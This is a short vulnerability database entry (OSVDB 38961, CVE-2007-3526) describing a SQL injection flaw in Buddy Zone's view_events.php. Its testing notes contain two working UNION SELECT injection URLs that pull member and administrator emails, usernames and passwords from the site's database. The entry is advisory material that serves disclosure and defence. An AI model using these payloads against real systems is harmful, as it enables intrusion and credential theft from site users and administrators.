Buddy Zone view_events.php cat_id Variable SQL Injection

2007-06-30T00:00:00
ID OSVDB:38961
Type osvdb
Reporter OSVDB
Modified 2007-06-30T00:00:00

Description

Manual Testing Notes

http://[target]/view_events.php?cat_id=-1//UNION//ALL//SELECT//1,2,concat(member_email,0x3a,member_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//members/ http://[target]/view_events.php?cat_id=-1//UNION//ALL//SELECT//1,2,concat(admin_user,0x3a,admin_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24//FROM//admin_users/

References:

Related OSVDB ID: 38960 Related OSVDB ID: 38962 ISS X-Force ID: 35187 Generic Exploit URL: http://www.milw0rm.com/exploits/4128 CVE-2007-3526 Bugtraq ID: 24726